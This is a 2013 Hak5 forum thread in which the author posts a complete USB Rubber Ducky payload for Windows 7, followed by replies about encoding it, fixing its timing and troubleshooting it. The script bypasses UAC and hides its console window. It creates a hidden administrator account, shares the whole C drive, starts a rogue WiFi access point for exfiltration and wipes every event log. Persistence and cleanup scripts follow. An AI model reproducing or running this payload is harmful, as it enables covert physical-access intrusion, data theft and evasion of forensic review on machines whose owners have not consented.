Darren Kitchen Posted August 19, 2013 Share Posted August 19, 2013 I wrote this to quickly and easily exfiltrate data from a target Windows 7 machine. It's successful in sharing data without setting off alarms by touching the network or mounting mass storage. This payload adds a hidden admin user with NTFS privs for the C drive, enables file and printer sharing, shares the C drive and create a WiFi SoftAP on the target Windows 7 machine. Logs are cleaned on exit. It may be better suited for exfiltration as you only require physical access to the machine for 15-20 seconds, thereafter you only require wifi proximity to download (or upload) files. Of course your target requires a wireless Interface. I'm using a new UAC bypass and terminal obfuscation technique which could be applied to your payloads. Payload REM Payload: Exfiltration via WiFi SoftAP REM Target: Windows 7 REM Author: Darren Kitchen REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 REM *** Make console light yellow on bright white and very tiny *** STRING color FE ENTER STRING mode con:cols=14 lines=1 ENTER REM *** Add User techsupport *** STRING copy con techsupport.cmd ENTER STRING net User techsupport techsupport /ADD ENTER REM *** Add User techsupport to Admin Group *** STRING net LocalGroup Administrators techsupport /ADD ENTER REM *** Hide User techsupport *** STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v techsupport /t REG_DWORD /d 0 /f ENTER REM *** Enable File and Printer Sharing *** STRING netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes ENTER REM *** Share C Drive and grant techsupport NTFS privs *** STRING net share techsupport=c:\ /UNLIMITED ENTER STRING icacls c:\users\* /grant techsupport:(OI)(CI)F ENTER REM *** Bring up any WiFi Interfaces on the PC *** STRING netsh interface set interface name="Wireless Network Connection" admin=enabled ENTER STRING netsh interface set interface name="Wireless Network Connection 2" admin=enabled ENTER STRING netsh interface set interface name="Wireless Network Connection 3" admin=enabled ENTER REM *** Start software Wireless Access Point *** STRING netsh wlan set hostednetwork ssid=techsupport key=techsupport ENTER STRING netsh wlan start hostednetwork ENTER REM *** Clear log files and exit *** STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER STRING exit ENTER CTRL z ENTER REM *** Run Payload and Minimize *** STRING techsupport.cmd ENTER ALT SPACE DELAY 100 STRING n Usage After deploying payload on target Windows 7 PC connect to the SoftAP from another machine (SSID techsupport Password techsupport) and browse to the C drive share (techsupport) with username techsupport and password techsupport. Post-Exploitation Cleanup From the C drive share over WiFi upload the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd del c:\windows\system32\techsupport.cmd net user techsupport /delete net share techsupport /delete for /f %x in ('wevtutil el') do wevtutil cl "%x" del "%~f0" Persistence Alternatively if you would like the techsupport user, share and network to be available all of the time consider adding the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes netsh interface set interface name="Wireless Network Connection" admin=enabled netsh interface set interface name="Wireless Network Connection 2" admin=enabled netsh interface set interface name="Wireless Network Connection 3" admin=enabled netsh wlan set hostednetwork ssid=techsupport key=techsupport netsh wlan start hostednetwork Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted August 19, 2013 Share Posted August 19, 2013 Well done, hopefully this will inspire others to make some more ducky payloads. Quote Link to comment Share on other sites More sharing options...
tecra Posted September 1, 2013 Share Posted September 1, 2013 im not understanding the payload toolkit and using custom scripts. i understand the inject.bin needs to be on the duck but each time i use the toolkit is it creating a custom inject.bin for that payload? how do i use this exfiltration script? just type it in payload.txt?? Quote Link to comment Share on other sites More sharing options...
no42 Posted September 1, 2013 Share Posted September 1, 2013 1. Type it into a text file, using your favourite editor: nano, vi, notepad, notepad++. 2. Save as txt file eg. payload.txt 3. run the file through the encoder to generate a new inject.bin eg. java -jar encoder -i payload.txt -o /path/to/sdcard/inject.bin 4. put the sdcard into the ducky 5. put the ducky into the computer The ducky reads the inject.bin file for instructions, the plain-text language above is the high-level programming language called Ducky-Script. Quote Link to comment Share on other sites More sharing options...
tecra Posted September 1, 2013 Share Posted September 1, 2013 1. Type it into a text file, using your favourite editor: nano, vi, notepad, notepad++. 2. Save as txt file eg. payload.txt 3. run the file through the encoder to generate a new inject.bin eg. java -jar encoder -i payload.txt -o /path/to/sdcard/inject.bin 4. put the sdcard into the ducky 5. put the ducky into the computer The ducky reads the inject.bin file for instructions, the plain-text language above is the high-level programming language called Ducky-Script. thank you for the reply midnite snake as i understand that the encoder is used in order to complete a custom payload ;) however when this script runs it brings up the recycle bin and then trys to rename a file?? has anyone tested this script outside of darren? could my delays be off? please see video i took here @Dropbox http://db.tt/QiZ70olQ Quote Link to comment Share on other sites More sharing options...
tecra Posted September 1, 2013 Share Posted September 1, 2013 ok so i was able to tweak the delays and found that helping however still not working completely. i found that the wireless network connection was being setup but not enabled. Quote Link to comment Share on other sites More sharing options...
no42 Posted September 3, 2013 Share Posted September 3, 2013 ok so i was able to tweak the delays and found that helping however still not working completely. i found that the wireless network connection was being setup but not enabled. Untitled.png Its good that you've worked out that you need to tweak the timings, but just to check what firmware are you using stock/community? Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 3, 2013 Author Share Posted September 3, 2013 It's not bringing up "Wireless Network Connection 2" and "Wireless Network Connection 3" most likely because they do not exist. In testing my target machine had 3 wireless adapters so I'd bring them all up. Most PCs will only have 1 labeled "Wireless Network Connection" (btw this is why I prefer Linux's wlan0, wlan1, wlan2, etc...) Quote Link to comment Share on other sites More sharing options...
tecra Posted September 10, 2013 Share Posted September 10, 2013 Its good that you've worked out that you need to tweak the timings, but just to check what firmware are you using stock/community? i'm understanding that shipped is stock firmware. i have visited https://forums.hak5.org/index.php?/topic/28254-tutorial-re-flashingupgrading-the-ducky-winxp-32bit/ and the documentation is old. i've done everything except downloading the zip file as it no longer exists. how am i able to flash firmware? Quote Link to comment Share on other sites More sharing options...
tecra Posted September 10, 2013 Share Posted September 10, 2013 this may help the kids @home https://app.box.com/s/dr19nfs97apyi1hsy3va Duck Programming.zip Created Sep 22, 2012 by anode@106automation.com Quote Link to comment Share on other sites More sharing options...
tecra Posted September 10, 2013 Share Posted September 10, 2013 (edited) flashed with 2.1 hex just fine. the exfiltration payload runs better than before, please see pastebin of cmd prompt output. also attached is network adapters, wifi2 setup and enabled with an ssid of techsupport. still not seeing the ssid from another machine?? http://pastebin.com/GP3CVSci http://imgur.com/j9cj5tP,HV0ZOji#0 http://imgur.com/j9cj5tP,HV0ZOji#1 Edited September 10, 2013 by tecra Quote Link to comment Share on other sites More sharing options...
HarryT Posted October 20, 2013 Share Posted October 20, 2013 Hi Darren / guys Have run the USB exfiltration script and it works great! As for the wifi script - What Version Duck Encoder was this created on? I ran this in Ver 2.4 and the payload writes fine, hopped over to Kali Linux and have been able to hook up to techsupport hidden network but I'm not seeing my computer name listed. I'm seeing Windows Networks only. Darren did use Ubuntu in the video -wouldn't expect it to be too different. I'm almost there - if anybody has had Kali issues and fixed it - I'd sure appreciate a nudge in the right direction! Thanks HarryT Quote Link to comment Share on other sites More sharing options...
escher818 Posted May 20, 2014 Share Posted May 20, 2014 sorry to bring up such an old topic, but i added some of darren's stuff in a big script of my own and the hidden user registry key doesn't work for me. After WinLogon, i don't have the sub-keys SpecialAccounts and UserLIst so i was wondering if anyone knew how to incorporate those into the line darren already posted? i didn't find much when looking up adding sub-keys from a terminal Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.